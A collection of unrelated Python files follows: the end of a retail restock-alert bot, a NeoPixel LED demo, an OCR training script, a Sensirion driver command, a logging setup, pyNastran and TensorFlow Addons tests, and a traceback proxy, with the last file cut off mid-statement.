        img_raw = str(imgs[0].attrib)
        img = img_raw[20:-2]
        # extract the title from the embedded twitter-card JSON by string slicing
        title = al[al.find('"twitter":{"title":') + 20 : al.find('","card')]
        now = datetime.now()
        current_time = now.strftime("%H:%M:%S")
        if "Deliver to" not in page.text:
            # print("[" + current_time + "] " + "Sold Out: (Target.com) " + title)
            stockdict.update({url: 'False'})
        else:
            print("[" + current_time + "] " + "In Stock: (Target.com) " + title + " - " + url)
            slack_data = {
                'username': "Target Bot",
                'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/target.png",
                'content': "Target Stock Alert:",
                'embeds': [{
                    'title': title,
                    'description': title + " in stock at Target",
                    'url': url,
                    "fields": [
                        {
                            "name": "Time:",
                            "value": current_time
                        },
                        {
                            "name": "Status:",
                            "value": "In Stock"
                        }
                    ],
                    'thumbnail': {
                        'url': img
                    }
                }]
            }
            # only alert on an out-of-stock -> in-stock transition
            if stockdict.get(url) == 'False':
                response = requests.post(
                    webhook_url, data=json.dumps(slack_data),
                    headers={'Content-Type': 'application/json'})
            stockdict.update({url: 'True'})
            #print(stockdict)
class BestBuy:
    """Check a BestBuy SKU via the button-state API and alert on restock.

    Queries BestBuy's tcfb model.json endpoint for the SKU's buttonState and
    posts a Discord-style webhook when the state becomes ADD_TO_CART
    (transition tracked via the module-level stockdict, keyed by SKU).
    """

    def __init__(self, sku, hook):
        """
        Args:
            sku (str): BestBuy SKU identifier.
            hook (str): key into webhook_dict for the webhook URL to notify.
        """
        self.sku = sku
        self.hook = hook
        webhook_url = webhook_dict[hook]
        now = datetime.now()
        current_time = now.strftime("%H:%M:%S")
        url = "https://www.bestbuy.com/api/tcfb/model.json?paths=%5B%5B%22shop%22%2C%22scds%22%2C%22v2%22%2C%22page%22%2C%22tenants%22%2C%22bbypres%22%2C%22pages%22%2C%22globalnavigationv5sv%22%2C%22header%22%5D%2C%5B%22shop%22%2C%22buttonstate%22%2C%22v5%22%2C%22item%22%2C%22skus%22%2C" + sku + "%2C%22conditions%22%2C%22NONE%22%2C%22destinationZipCode%22%2C%22%2520%22%2C%22storeId%22%2C%22%2520%22%2C%22context%22%2C%22cyp%22%2C%22addAll%22%2C%22false%22%5D%5D&method=get"
        headers2 = {
            "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
            "accept-encoding": "gzip, deflate, br",
            "accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
            "cache-control": "max-age=0",
            "upgrade-insecure-requests": "1",
            "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36"
        }
        page = requests.get(url, headers=headers2)
        link = "https://www.bestbuy.com/site/" + sku + ".p?skuId=" + sku
        al = page.text
        search_string = '"skuId":"' + sku + '","buttonState":"'
        # BUGFIX: the offset was hard-coded as 33, which only equals
        # len(search_string) for 7-character SKUs; use len() so any SKU
        # length parses correctly.
        stock_status = al[al.find(search_string) + len(search_string): al.find('","displayText"')]
        product_name = sku_dict.get(sku)
        if stock_status == "SOLD_OUT":
            # print("[" + current_time + "] " + "Sold Out: (BestBuy.com) " + product_name)
            stockdict.update({sku: 'False'})
        elif stock_status == "CHECK_STORES":
            # print(product_name + " sold out @ BestBuy (check stores status)")
            stockdict.update({sku: 'False'})
        else:
            if stock_status == "ADD_TO_CART":
                print("[" + current_time + "] " + "In Stock: (BestBuy.com) " + product_name + " - " + link)
                slack_data = {
                    'username': "BestBuy Bot",
                    'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/bestbuy.png",
                    'content': "BestBuy Stock Alert:",
                    'embeds': [{
                        'title': product_name,
                        'description': product_name + " in stock at BestBuy",
                        'url': link,
                        "fields": [
                            {
                                "name": "Time:",
                                "value": current_time
                            },
                            {
                                "name": "Status:",
                                "value": "In Stock"
                            }
                        ],
                        'thumbnail': {
                            'url': bbimgdict.get(sku)
                        }
                    }]
                }
                # only alert on an out-of-stock -> in-stock transition
                if stockdict.get(sku) == 'False':
                    response = requests.post(
                        webhook_url, data=json.dumps(slack_data),
                        headers={'Content-Type': 'application/json'})
                stockdict.update({sku: 'True'})
                # print(stockdict)
class Walmart:
    """Checks a Walmart product page with headless Chrome and posts a webhook
    alert when the item becomes purchasable.

    All work happens in __init__ (matching the other site-checker classes in
    this module); instances are created purely for their side effects.
    """

    def __init__(self, url, hook):
        """
        :param str url: Walmart product page URL to check.
        :param str hook: key into the module-level ``webhook_dict``.
        """
        # Local import keeps the narrowed exception handling self-contained;
        # selenium is already a dependency of this module (webdriver below).
        from selenium.common.exceptions import NoSuchElementException
        self.url = url
        self.hook = hook
        webhook_url = webhook_dict[hook]
        options = webdriver.ChromeOptions()
        options.add_experimental_option('excludeSwitches', ['enable-logging'])
        options.add_argument('log-level=3')
        options.add_argument('--ignore-certificate-errors')
        options.add_argument(
            '--user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36"')
        options.add_argument("--headless")
        options.add_argument("--disable-dev-shm-usage")
        # BUG FIX: Chrome has no "--sandbox" switch; headless Chrome on Heroku
        # requires "--no-sandbox" to start at all.
        options.add_argument("--no-sandbox")
        # Heroku setup
        # NOTE(review): assumes GOOGLE_CHROME_BIN and CHROMEDRIVER_PATH are set
        # in the environment — confirm for non-Heroku deployments.
        options.binary_location = os.environ.get("GOOGLE_CHROME_BIN")
        driver = webdriver.Chrome(executable_path=os.environ.get("CHROMEDRIVER_PATH"), options=options)
        try:
            driver.get(url)
            title = driver.find_element_by_xpath("//h1[@class='prod-ProductTitle prod-productTitle-buyBox font-bold']").text
            price = driver.find_element_by_xpath(
                "//span[@class='price display-inline-block arrange-fit price price--stylized']//span[@class='price-characteristic']").text
            img_raw = driver.find_element_by_xpath("//meta[@property='og:image']")
            img = img_raw.get_attribute('content')
            try:
                # Presence of the add-on add-to-cart button is the in-stock signal.
                driver.find_element_by_xpath(
                    '//*[@id="add-on-atc-container"]/div[1]/section/div[1]/div[3]/button/span/span')
                add_to_cart = True
            except NoSuchElementException:
                # Narrowed from a bare except: driver/network failures now
                # propagate to the caller's retry loop instead of being
                # misread as "out of stock".
                add_to_cart = False
            now = datetime.now()
            current_time = now.strftime("%H:%M:%S")
            if add_to_cart:
                print("[" + current_time + "] " + "In Stock: (Walmart.com) " + title + " for $" + price + " - " + url)
                slack_data = {
                    'username': "Walmart Bot",
                    'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/walmart.png",
                    'content': "Walmart Stock Alert:",
                    'embeds': [{
                        'title': title,
                        'description': title + " in stock at Walmart for $" + price,
                        'url': url,
                        "fields": [
                            {
                                "name": "Time:",
                                "value": current_time
                            },
                            {
                                "name": "Price:",
                                "value": "$" + price
                            }
                        ],
                        'thumbnail': {
                            'url': img
                        }
                    }]
                }
                # Only alert on a False -> True transition to avoid spamming.
                if stockdict.get(url) == 'False':
                    try:
                        response = requests.post(
                            webhook_url, data=json.dumps(slack_data),
                            headers={'Content-Type': 'application/json'})
                    except Exception:
                        # Best-effort webhook delivery; keep polling either way.
                        print("Webhook sending failed. Invalid URL configured.")
                stockdict.update({url: 'True'})
            else:
                print("[" + current_time + "] " + "Sold Out: (Walmart.com) " + title)
                stockdict.update({url: 'False'})
        finally:
            # BUG FIX: quit the browser even when scraping raises; otherwise
            # each failed poll leaks a Chrome process.
            driver.quit()
# TODO test and fix if necessary
class BH:
    """Checks a B&H Photo product page and pings a webhook when the item
    comes in stock. All work happens in __init__, matching the other
    site-checker classes in this module."""

    def __init__(self, url, hook):
        self.url = url
        self.hook = hook
        webhook_url = webhook_dict[hook]
        page = requests.get(url)
        now = datetime.now()
        current_time = now.strftime("%H:%M:%S")
        # Anything but a 200 response is silently ignored; the caller's
        # polling loop will try again.
        if page.status_code != 200:
            return
        in_stock = "Add to Cart" in page.text
        if in_stock:
            print("[" + current_time + "] " + "In Stock: (bhphotovideo.com) " + url)
            slack_data = {'content': "[" + current_time + "] " + url + " in stock at B&H"}
            # Only alert on a False -> True transition to avoid spamming.
            if stockdict.get(url) == 'False':
                response = requests.post(
                    webhook_url, data=json.dumps(slack_data),
                    headers={'Content-Type': 'application/json'})
            stockdict.update({url: 'True'})
        else:
            print("[" + current_time + "] " + "Sold Out: (bhphotovideo.com) " + url)
            stockdict.update({url: 'False'})
# classify all the URLs by site, filling the per-site work lists and lookup dicts
for url in url_dict:
    hook = url_dict[url]  # get the hook for the url so it can be passed in to the per-site lists being generated below
    # Amazon URL Detection
    if "amazon.com" in url:
        if "offer-listing" in url:
            amazonlist.append(url)
            print("Amazon detected using Webhook destination " + hook)
        else:
            print("Invalid Amazon link detected. Please use the Offer Listing page.")
    # Gamestop URL Detection (comment fixed: was mislabelled "Target")
    elif "gamestop.com" in url:
        gamestoplist.append(url)
        print("Gamestop URL detected using Webhook destination " + hook)
    # BestBuy URL Detection
    elif "bestbuy.com" in url:
        print("BestBuy URL detected using Webhook destination " + hook)
        parsed = urlparse.urlparse(url)
        # NOTE(review): raises KeyError if the URL has no skuId query parameter.
        sku = parse_qs(parsed.query)['skuId']
        sku = sku[0]
        bestbuylist.append(sku)
        headers = {
            "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
            "accept-encoding": "gzip, deflate, br",
            "accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
            "cache-control": "max-age=0",
            "upgrade-insecure-requests": "1",
            "user-agent": " "
        }
        # One synchronous page fetch per BestBuy URL at startup; caches the
        # product title and thumbnail used later when posting alerts.
        page = requests.get(url, headers=headers)
        al = page.text
        tree = html.fromstring(page.content)
        img = tree.xpath('//img[@class="primary-image"]/@src')[0]
        # Slice the product name out of the <title > tag (note the space).
        title = al[al.find('<title >') + 8 : al.find(' - Best Buy</title>')]
        sku_dict.update({sku: title})
        bbdict.update({sku: hook})
        bbimgdict.update({sku: img})
    # Target URL Detection
    elif "target.com" in url:
        targetlist.append(url)
        print("Target URL detected using Webhook destination " + hook)
    # Walmart URL Detection
    elif "walmart.com" in url:
        walmartlist.append(url)
        print("Walmart URL detected using Webhook destination " + hook)
    # B&H Photo URL Detection
    elif "bhphotovideo.com" in url:
        bhlist.append(url)
        print("B&H URL detected using Webhook destination " + hook)
# set all URLs to be "out of stock" to begin
for url in url_dict:
    stockdict.update({url: 'False'})
# set all SKUs to be "out of stock" to begin
for sku in sku_dict:
    stockdict.update({sku: 'False'})
# DECLARE SITE FUNCTIONS
def amazon_run(url):
    """Poll one Amazon offer-listing URL forever (one thread per URL)."""
    hook = url_dict[url]  # loop-invariant lookup hoisted out of the loop
    while True:
        try:
            Amazon(url, hook)
        except Exception:
            # Narrowed from a bare except so KeyboardInterrupt/SystemExit can
            # still stop the thread.
            print("Some error occurred parsing Amazon: " + url)
        time.sleep(10)
def gamestop_run(url):
    """Poll one GameStop URL forever (one thread per URL)."""
    hook = url_dict[url]  # loop-invariant lookup hoisted out of the loop
    while True:
        try:
            Gamestop(url, hook)
        except Exception:
            # Narrowed from a bare except so KeyboardInterrupt/SystemExit can
            # still stop the thread.
            print("Some error occurred parsing GameStop")
        time.sleep(10)
def target_run(url):
    """Poll one Target URL forever (one thread per URL)."""
    hook = url_dict[url]  # loop-invariant lookup hoisted out of the loop
    while True:
        try:
            Target(url, hook)
        except Exception:
            # Narrowed from a bare except so KeyboardInterrupt/SystemExit can
            # still stop the thread.
            print("Some error occurred parsing Target")
        time.sleep(10)
def bh_run(url):
    """Poll one B&H Photo URL forever (one thread per URL)."""
    hook = url_dict[url]  # loop-invariant lookup hoisted out of the loop
    while True:
        try:
            BH(url, hook)
        except Exception:
            # Narrowed from a bare except so KeyboardInterrupt/SystemExit can
            # still stop the thread.
            print("Some error occurred parsing BH Photo")
        time.sleep(10)
def bestbuy_run(sku):
    """Poll one Best Buy SKU forever (one thread per SKU).

    Note: keyed by SKU via ``bbdict``, unlike the URL-keyed pollers.
    """
    hook = bbdict[sku]  # loop-invariant lookup hoisted out of the loop
    while True:
        try:
            BestBuy(sku, hook)
        except Exception:
            # Narrowed from a bare except so KeyboardInterrupt/SystemExit can
            # still stop the thread.
            print("Some error occurred parsing Best Buy")
        time.sleep(10)
def walmart_run(url):
    """Poll one Walmart URL forever (one thread per URL)."""
    hook = url_dict[url]  # loop-invariant lookup hoisted out of the loop
    while True:
        try:
            Walmart(url, hook)
        except Exception:
            # Narrowed from a bare except so KeyboardInterrupt/SystemExit can
            # still stop the thread.
            print("Some error occurred parsing WalMart")
        time.sleep(10)
# MAIN EXECUTION: one polling thread per tracked product, started in the same
# site order as before with the same 0.5 s stagger between launches.
site_runners = [
    (amazonlist, amazon_run),
    (gamestoplist, gamestop_run),
    (targetlist, target_run),
    (bhlist, bh_run),
    (bestbuylist, bestbuy_run),
    (walmartlist, walmart_run),
]
for targets, runner in site_runners:
    for item in targets:
        Thread(target=runner, args=(item,)).start()
        time.sleep(0.5)
|
import time
import board
import neopixel
# 10-pixel onboard NeoPixel strip; auto_write=False means changes are only
# pushed to the LEDs when pixels.show() is called.
pixels = neopixel.NeoPixel(board.NEOPIXEL, 10, brightness=0.2, auto_write=False)
# Non-zero enables the rainbow animation in the main loop.
rainbow_cycle_demo = 1
def colorwheel(pos):
    """Map a wheel position 0-255 to an (r, g, b) tuple.

    The wheel fades red -> green over 0-84, green -> blue over 85-169 and
    blue -> red over 170-255; anything outside 0-255 yields black.
    """
    if not 0 <= pos <= 255:
        return (0, 0, 0)
    if pos < 85:
        return (255 - pos * 3, pos * 3, 0)
    if pos < 170:
        offset = pos - 85
        return (0, 255 - offset * 3, offset * 3)
    offset = pos - 170
    return (offset * 3, 0, 255 - offset * 3)
def rainbow_cycle(wait):
    """Sweep one rainbow cycle across the 10-pixel strip.

    Each of the 255 steps offsets every pixel's wheel position, pushes the
    frame with pixels.show() and pauses ``wait`` seconds.
    """
    for step in range(255):
        for idx in range(10):
            wheel_pos = (idx * 256 // 10) + step * 5
            pixels[idx] = colorwheel(wheel_pos & 255)
        pixels.show()
        time.sleep(wait)
# Main loop: animate forever while the demo flag is set (device firmware
# entry point — never returns).
while True:
    if rainbow_cycle_demo:
        rainbow_cycle(0.05)
|
'''
@Author: zm
@Date and Time: 2019/8/8 15:14
@File: train.py
'''
import math
import numpy as np
import tensorflow as tf
from keras import backend as K
from keras.layers import Input
from keras import Model
from keras.optimizers import Adam
from keras.callbacks import Callback
from Loss import Loss
from Dataset import Dataset
from generator import generator
from get_dataset import get_dataset
from ImageTf import ImageTf
from ToOneHot import ToOneHot
from ocr_model import OCR_Model
seq_len = 4
class CrossEntropy(Loss):
    """Mean categorical cross-entropy averaged over the character positions
    of a fixed-length sequence prediction."""

    def compute_loss(self, inputs, seq_len=seq_len):
        """inputs = (y_true, y_pred), each concatenated along the last axis
        into seq_len equal chunks; returns the average per-position loss."""
        labels, logits = inputs
        label_chunks = tf.split(labels, seq_len, axis=-1)
        logit_chunks = tf.split(logits, seq_len, axis=-1)
        per_position = [
            K.mean(K.categorical_crossentropy(t, K.softmax(p, axis=-1)))
            for t, p in zip(label_chunks, logit_chunks)
        ]
        return sum(per_position) / seq_len
if __name__ == '__main__':
    train_batch_size = 16
    val_batch_size = 100
    num_classes = 26
    # (height, width, channels) of the input images.
    image_size = (53, 129, 3)
    (X_train, Y_train), (X_val, Y_val) = get_dataset()
    train_dataset = Dataset(X_train, Y_train, image_transform=ImageTf(image_size[:2]),
                            label_transform=ToOneHot(num_classes))
    val_dataset = Dataset(X_val, Y_val, image_transform=ImageTf(image_size[:2]), label_transform=ToOneHot(num_classes))
    train_generator = generator(train_dataset, batch_size=train_batch_size, shuffle=True)
    val_generator = generator(val_dataset, batch_size=val_batch_size, shuffle=False)
    image_input = Input(shape=image_size, name='image_input', dtype='float32')
    # One-hot labels for all seq_len positions, concatenated along the last axis.
    y_true = Input(shape=(num_classes * seq_len, ), dtype='int32')
    out = OCR_Model(image_input, num_classes, seq_len=seq_len)
    # The loss layer consumes (y_true, prediction); the model is compiled with
    # no external loss, so the layer's output acts as the training loss.
    out = CrossEntropy(-1)([y_true, out])
    model = Model([y_true, image_input], out)
    model.compile(Adam())
    num_val_examples = len(Y_val)
    num_val_batches = math.ceil(num_val_examples / val_batch_size)
    def evaluate(model, seq_len=seq_len):
        """Return (mean val loss, full-sequence top-1 accuracy %) over one pass."""
        total_loss = 0.
        total_corrects = 0
        for _ in range(num_val_batches):
            batch_data, _ = next(val_generator)
            val_loss, predict = model.test_on_batch(batch_data, y=None), model.predict_on_batch(batch_data)
            total_loss += val_loss
            y_trues = np.split(batch_data[0], seq_len, axis=-1)
            y_preds = np.split(predict, seq_len, axis=-1)
            # A sample counts as correct only if every position matches.
            tmp = 1
            for (y_true, y_pred) in zip(y_trues, y_preds):
                tmp *= (np.argmax(y_true, axis=-1) == np.argmax(y_pred, axis=-1))
            total_corrects += np.sum(tmp)
        val_loss = total_loss / num_val_batches
        val_acc = (total_corrects / num_val_examples) * 100
        return val_loss, val_acc
    class Evaluator(Callback):
        """Keras callback: run the validation pass at the end of every epoch."""
        def __init__(self):
            super(Evaluator, self).__init__()
        def on_epoch_end(self, epoch, logs=None):
            val_loss, val_acc = evaluate(self.model)
            print(f'val_loss = {val_loss:.5f}, top-1 val_acc = {val_acc:.2f}.')
    evaluator = Evaluator()
    model.fit_generator(
        train_generator,
        steps_per_epoch=math.ceil(len(Y_train) / train_batch_size),
        epochs=10,
        callbacks=[evaluator],
        shuffle=False,
        initial_epoch=0
    )
""" Callables
What are callables?
Any obje
""" |
# -*- coding: utf-8 -*-
# (c) Copyright 2020 Sensirion AG, Switzerland
##############################################################################
##############################################################################
# _____ _ _ _______ _____ ____ _ _
# / ____| /\ | | | |__ __|_ _/ __ \| \ | |
# | | / \ | | | | | | | || | | | \| |
# | | / /\ \| | | | | | | || | | | . ` |
# | |____ / ____ \ |__| | | | _| || |__| | |\ |
# \_____/_/ \_\____/ |_| |_____\____/|_| \_|
#
# THIS FILE IS AUTOMATICALLY GENERATED AND MUST NOT BE EDITED MANUALLY!
#
# Generator: sensirion-shdlc-interface-generator 0.5.1
# Product: Sensor Bridge
# Version: 0.1.0
#
##############################################################################
##############################################################################
# flake8: noqa
from __future__ import absolute_import, division, print_function
from sensirion_shdlc_driver.command import ShdlcCommand
from struct import pack, unpack
import logging
log = logging.getLogger(__name__)
class SensorBridgeCmdPortVoltageOnOffBase(ShdlcCommand):
    """
    SHDLC command 0x01: "Port Voltage On Off".

    Base class that pins the command ID; the concrete subclass below
    supplies the payload and timing parameters.
    """
    def __init__(self, *args, **kwargs):
        # Forward everything to ShdlcCommand with the fixed command ID 0x01.
        super(SensorBridgeCmdPortVoltageOnOffBase, self).__init__(
            0x01, *args, **kwargs)
class SensorBridgeCmdPortVoltageOnOff(SensorBridgeCmdPortVoltageOnOffBase):
    def __init__(self, port, state):
        """
        Port Voltage On Off Command
        Switches a port supply on or off. If switched on, the previously set
        voltage will be applied.
        :param int port:
            The port(s) to switch on or off:
            -  0x00: Port 1
            -  0x01: Port 2
            -  0xFF: All ports
        :param int state:
            The new state to set:
            -  0x00: off
            -  0x01: on
        """
        super(SensorBridgeCmdPortVoltageOnOff, self).__init__(
            # Payload: two big-endian unsigned bytes — [port, state].
            data=b"".join([pack(">B", port),
                           pack(">B", state)]),
            max_response_time=0.05,
            post_processing_time=0.0,
            min_response_length=0,
            max_response_length=0
        )
|
import logging.config
import logging.handlers
import os
from pathlib import Path
def get_logs_directory():
    """Return the ``logs`` directory that lives next to this module as a Path.

    BUG FIX: the previous ``os.path.split(__file__)[0] + '/logs'`` produced
    the absolute path ``/logs`` whenever ``__file__`` had no directory
    component; ``Path(__file__).parent`` yields ``.`` in that case instead.
    """
    return Path(__file__).parent / 'logs'
def configure_logging():
    """Configure the 'root' and 'console' loggers.

    'root' writes generic-formatted records to stderr and to a rotating log
    file in the package-local ``logs`` directory; 'console' writes plain
    messages to stdout. The logs directory is created on demand.
    """
    logs_directory = get_logs_directory()
    # exist_ok avoids the check-then-create race of the old exists()/mkdir()
    # pair when two processes start at once; parents=True is free here.
    logs_directory.mkdir(parents=True, exist_ok=True)
    logging.config.dictConfig({
        'version': 1,
        'formatters': {
            'generic': {
                'format': '[%(asctime)s][%(levelname)s][%(module)s]: %(message)s'
            },
            'plain': {
                'format': '%(message)s'
            },
        },
        'handlers': {
            'errstream': {
                'class': 'logging.StreamHandler',
                'formatter': 'generic',
                'level': 'INFO',
                'stream': 'ext://sys.stderr'
            },
            'stdout': {
                'class': 'logging.StreamHandler',
                'formatter': 'plain',
                'level': 'INFO',
                'stream': 'ext://sys.stdout'
            },
            'file': {
                'class': 'logging.handlers.RotatingFileHandler',
                'formatter': 'generic',
                'level': 'INFO',
                'filename': f'{logs_directory}/tradernet_cli.log',
                'maxBytes': 8192,
                'backupCount': 5,
            },
        },
        'loggers': {
            'root': {
                'handlers': ['errstream', 'file'],
                'level': 'INFO',
            },
            'console': {
                'handlers': ['stdout'],
                'level': 'INFO',
            },
        },
        'disable_existing_loggers': False,
    })
|
"""
Defines TestUGrid
"""
from __future__ import print_function
import os
import unittest
import numpy as np
import pyNastran
from pyNastran.bdf.bdf import read_bdf
from pyNastran.converters.nastran.nastran_to_ugrid import nastran_to_ugrid
from pyNastran.converters.nastran.nastran_to_ugrid3d import merge_ugrid3d_and_bdf_to_ugrid3d_filename
from pyNastran.converters.aflr.ugrid.ugrid3d_to_nastran import ugrid3d_to_nastran
from pyNastran.converters.aflr.ugrid.ugrid3d_to_tecplot import (
ugrid_to_tecplot, ugrid3d_to_tecplot_filename, read_ugrid)
from pyNastran.utils.log import get_logger
PKG_PATH = pyNastran.__path__[0]
UGRID_PATH = os.path.join(PKG_PATH, 'converters', 'aflr', 'ugrid', 'models')
TECPLOT_PATH = os.path.join(PKG_PATH, 'converters', 'tecplot', 'models')
NASTRAN_PATH = os.path.join(PKG_PATH, '..', 'models')
class TestUgrid(unittest.TestCase):
    """runs ugrid2d/3d tests"""
    def test_ugrid_01(self):
        """tests solid_bending.bdf

        Round-trips a Nastran solid model through the UGRID format, skins the
        solids back to shells, writes Tecplot output, and finally merges the
        UGRID and BDF back into a new UGRID file.
        """
        nastran_filename1 = os.path.join(NASTRAN_PATH, 'solid_bending', 'solid_bending.bdf')
        ugrid_filename = os.path.join(NASTRAN_PATH, 'solid_bending', 'solid_bending.b8.ugrid')
        log = get_logger(level='warning')
        unused_ugrid_model = nastran_to_ugrid(
            nastran_filename1, ugrid_filename_out=ugrid_filename,
            properties=None, check_shells=False, check_solids=True, log=log)
        assert os.path.exists(ugrid_filename), ugrid_filename
        nastran_filename2 = os.path.join(NASTRAN_PATH, 'solid_bending', 'solid_bending2.bdf')
        ugrid_model = ugrid3d_to_nastran(
            ugrid_filename, nastran_filename2,
            include_shells=True, include_solids=True,
            convert_pyram_to_penta=False,
            encoding=None, size=16,
            is_double=False, log=log)
        nastran_filename3 = os.path.join(NASTRAN_PATH, 'solid_bending', 'solid_bending3.bdf')
        # Skin the solid elements so the model has shell elements to write;
        # every skinned element gets a dummy PID of 1.
        tris, quads = ugrid_model.skin_solids()
        ugrid_model.tris = tris
        ugrid_model.quads = quads
        ugrid_model.pids = np.ones(len(tris) + len(quads))
        ugrid_model.write_bdf(nastran_filename3)
        bdf_model = read_bdf(nastran_filename3)
        #print(bdf_model.get_bdf_stats())
        assert os.path.exists(nastran_filename3), nastran_filename3
        #tecplot_filename1 = os.path.join(NASTRAN_PATH, 'solid_bending', 'solid_bending.plt')
        #ugrid3d_to_tecplot_filename(model, tecplot_filename1)
        #assert os.path.exists(tecplot_filename1), tecplot_filename1
        tecplot_filename2 = os.path.join(NASTRAN_PATH, 'solid_bending', 'solid_bending2.plt')
        tecplot = ugrid_to_tecplot(ugrid_model)
        tecplot.write_tecplot(tecplot_filename2, res_types=None,
                              is_points=True,
                              adjust_nids=True)
        assert os.path.exists(tecplot_filename2), tecplot_filename2
        ugrid_filename_out = os.path.join(NASTRAN_PATH, 'solid_bending', 'solid_bending.b8.ugrid_out')
        pshell_pids_to_remove = []
        merge_ugrid3d_and_bdf_to_ugrid3d_filename(
            ugrid_filename, nastran_filename3, ugrid_filename_out,
            pshell_pids_to_remove,
            update_equivalence=True, tol=0.01)
        assert os.path.exists(ugrid_filename_out), ugrid_filename_out
    def test_ugrid3d_gui_box(self):
        """simple UGRID3D box model

        Exercises every ugrid->tecplot entry point (filename, filename input,
        and model input) against the same box model.
        """
        ugrid_filename = os.path.join(UGRID_PATH, 'box.b8.ugrid')
        log = get_logger(level='warning')
        tecplot_filename2 = os.path.join(UGRID_PATH, 'box.plt')
        ugrid_model = read_ugrid(ugrid_filename, log=log)
        tecplot = ugrid3d_to_tecplot_filename(ugrid_filename, tecplot_filename2)
        tecplot = ugrid_to_tecplot(ugrid_filename)
        tecplot = ugrid_to_tecplot(ugrid_model)
        tecplot.write_tecplot(tecplot_filename2, res_types=None,
                              is_points=True,
                              adjust_nids=True)
        assert os.path.exists(tecplot_filename2), tecplot_filename2
# Entry point: run the UGRID test suite when executed directly.
if __name__ == '__main__':  # pragma: no cover
    unittest.main()
|
import sys
def get_logger_traceback():  # noqa
    """
    Return a TracebackFrameProxy for the current log event.

    A traceback object only exists while an exception is in flight, so a
    throwaway ZeroDivisionError is raised and caught here purely to
    materialise one; the proxy then hides the stack frames that belong to
    the logging machinery.
    """
    try:
        raise ZeroDivisionError
    except ZeroDivisionError as exc:
        return TracebackFrameProxy(exc.__traceback__)
class TracebackFrameProxy:
    """Proxies a traceback frame to hide parts of the trace related to logging."""
    def __init__(self, tb, frames_level=0):
        # tb: a real traceback object.
        # frames_level: index into the censored frame list that this proxy
        # instance represents (0 = outermost kept frame).
        self.tb = tb
        self.frames_level = frames_level
        self.frames_from_top = self.organize_tb_frames()
    @property
    def tb_frame(self):
        return self.frames_from_top[self.frames_level]
    @property
    def tb_lineno(self):
        return self.tb_frame.f_lineno
    @property
    def tb_lasti(self):
        return self.tb_frame.f_lasti
    @property
    def tb_next(self):
        # Mimic the traceback protocol: "next" is a proxy one level deeper
        # into the same censored frame list, or None at the end.
        if self.frames_level < len(self.frames_from_top) - 1:
            return TracebackFrameProxy(self.tb, frames_level=self.frames_level + 1)
        return None
    def organize_tb_frames(self):
        """Walk up the frame stack, drop everything at/below logging's
        internal ``_log`` call, and return the kept frames outermost-first."""
        f = self.tb.tb_frame
        first_f = f
        found_log_call = False
        while f:
            if f.f_code.co_name == "_log" and "logging" in f.f_code.co_filename:
                if "makeRecord" in f.f_code.co_names:
                    # Skip _log itself and its caller (info/debug/...).
                    # NOTE(review): assumes _log has two callers on the stack;
                    # f_back could be None for an unusual call path — confirm.
                    f = f.f_back.f_back
                    found_log_call = True
                    break
            f = f.f_back
        # return entire stack if it can't find the right place to censor
        if not found_log_call:
            f = first_f
        frames = []
        while f:
            frames.append(f)
            f = f.f_back
        frames.reverse()
        return frames
    def __getattr__(self, name):
        # Fall through to the real traceback for anything not overridden above.
        return getattr(self.tb, name)
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for transform ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow.python.ops import gradient_checker
from tensorflow_addons.image import transform_ops
from tensorflow_addons.utils import test_utils
_DTYPES = set([
tf.dtypes.uint8, tf.dtypes.int32, tf.dtypes.int64, tf.dtypes.float16,
tf.dtypes.float32, tf.dtypes.float64
])
class ImageOpsTest(tf.test.TestCase):
    """Tests for transform_ops.transform / compose_transforms across all
    supported dtypes."""

    @test_utils.run_in_graph_and_eager_modes
    def test_compose(self):
        """Compose a 90-degree rotation with a translation and check the result."""
        for dtype in _DTYPES:
            image = tf.constant(
                [[1, 1, 1, 0], [1, 0, 0, 0], [1, 1, 1, 0], [0, 0, 0, 0]],
                dtype=dtype)
            # Rotate counter-clockwise by pi / 2.
            rotation = transform_ops.angles_to_projective_transforms(
                np.pi / 2, 4, 4)
            # Translate right by 1 (the transformation matrix is always inverted,
            # hence the -1).
            translation = tf.constant([1, 0, -1, 0, 1, 0, 0, 0],
                                      dtype=tf.dtypes.float32)
            composed = transform_ops.compose_transforms(rotation, translation)
            image_transformed = transform_ops.transform(image, composed)
            self.assertAllEqual(
                [[0, 0, 0, 0], [0, 1, 0, 1], [0, 1, 0, 1], [0, 1, 1, 1]],
                image_transformed)

    @test_utils.run_in_graph_and_eager_modes
    def test_extreme_projective_transform(self):
        """A strongly projective transform (non-zero bottom row) stays finite."""
        for dtype in _DTYPES:
            image = tf.constant(
                [[1, 0, 1, 0], [0, 1, 0, 1], [1, 0, 1, 0], [0, 1, 0, 1]],
                dtype=dtype)
            transformation = tf.constant([1, 0, 0, 0, 1, 0, -1, 0],
                                         tf.dtypes.float32)
            image_transformed = transform_ops.transform(image, transformation)
            self.assertAllEqual(
                [[1, 0, 0, 0], [0, 0, 0, 0], [1, 0, 0, 0], [0, 0, 0, 0]],
                image_transformed)

    def test_transform_static_output_shape(self):
        """output_shape passed as a tensor still yields a static result shape."""
        image = tf.constant([[1., 2.], [3., 4.]])
        result = transform_ops.transform(
